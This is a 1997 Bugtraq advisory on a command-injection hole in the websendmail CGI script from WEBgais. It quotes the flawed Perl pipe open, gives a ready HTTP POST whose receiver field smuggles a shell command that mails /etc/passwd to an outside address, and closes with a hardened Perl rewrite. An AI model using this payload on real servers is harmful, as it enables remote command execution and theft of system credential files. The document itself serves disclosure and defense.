websendmail cgi hole

Summary
Description: websendmail, a cgi-bin that comes with WEBgais, makes no real attempt to check its input in some cases. Thus you can execute arbitrary commands.
Author: Razvan Dragomirescu <drazvan@kappa.ro>
Compromise: Run arbitrary commands as the user who owns the webserver CGI process. (remote)
Vulnerable Systems: Any running an unpatched version of websendmail in their cgi directory.
Date: 4 July 1997
Details


Date: Fri, 4 Jul 1997 12:16:31 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in websendmail

Hi,

Since today is the 4th of July, this one is dedicated to all the American
readers of BUGTRAQ.

I'm surprised this wasn't posted on BUGTRAQ before. (If it's old news I'm
sorry, but I did not find it anywhere else).

So, websendmail is a cgi-bin that comes with the WEBgais package, which is
an interface to the GAIS search tool.
It is a PERL script that reads input from a form and sends e-mail to the
specified destination.
The version I am referring to is 1.0. It was released in 1995 but it is
still used (I've just tested it :) ).

As many other cgi-bin programs, this one does not check for special
characters in the user input.

Here's what it does:
(...)
$cmd="| $MAILBIN $VAR_receiver";
open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing
on the string to "un-webify" it (converts pluses to spaces and %xx
characters to their real value).
So if we set $VAR_receiver to ';mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;'
it will do the job (some of you know why I used this address ... :) ).

Now for the exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

Don't worry if the server displays an error message. The password file is
on the way :).

I think that's all.

Oh, and BTW, if anyone has WebGais installed and working on his computer
and wants to give me a hand in testing some new vulnerability in webgais
(I've found it but I need to test it), please contact me.

And, as always, I'm expecting to hear from you.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)

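As an added illustration (not code from the advisory, websendmail or WEBgais), the two-argument open() shape quoted above placed next to a hardened Perl version; the mailer path in $MAILBIN, the helper names and the sample input are assumptions.

```perl
#!/usr/bin/perl
# Added illustration, not code from websendmail or WEBgais. Shows the
# two-argument open() shape the advisory quotes next to a hardened version.
use strict;
use warnings;

# Assumed mailer path; the real $MAILBIN is whatever WEBgais was configured with.
my $MAILBIN = '/usr/lib/sendmail';

# Un-webify a form field the way the advisory describes: '+' becomes a space
# and %xx becomes the byte it encodes.
sub unwebify {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Vulnerable shape: a two-argument open() whose string starts with '|' hands the
# whole line to /bin/sh, so ';', '<' and '>' inside $receiver are interpreted.
# Only the command string is built here; nothing is executed.
sub vulnerable_command {
    my ($receiver) = @_;
    return "| $MAILBIN $receiver";
}

# Hardened: allow one strict address shape. Requiring an alphanumeric first
# character also rejects values starting with '-', so the recipient can never
# be parsed as a mailer option.
sub valid_receiver {
    my ($addr) = @_;
    return $addr =~ /^[A-Za-z0-9][A-Za-z0-9._-]*\@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/ ? 1 : 0;
}

# List-form open(): the recipient is passed as a single argv element to the
# mailer via execvp(), with no shell in between.
sub send_mail {
    my ($receiver, $body) = @_;
    die "refusing recipient: $receiver\n" unless valid_receiver($receiver);
    open(my $out, '|-', $MAILBIN, $receiver) or die "cannot run $MAILBIN: $!\n";
    print {$out} $body;
    close($out) or die "$MAILBIN exited with status $?\n";
    return 1;
}

# Constructed input: the receiver value from the advisory, as the script would see it.
my $hostile = unwebify(';mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;');
print "shell would see: ", vulnerable_command($hostile), "\n";
print valid_receiver($hostile) ? "accepted\n" : "rejected\n";
```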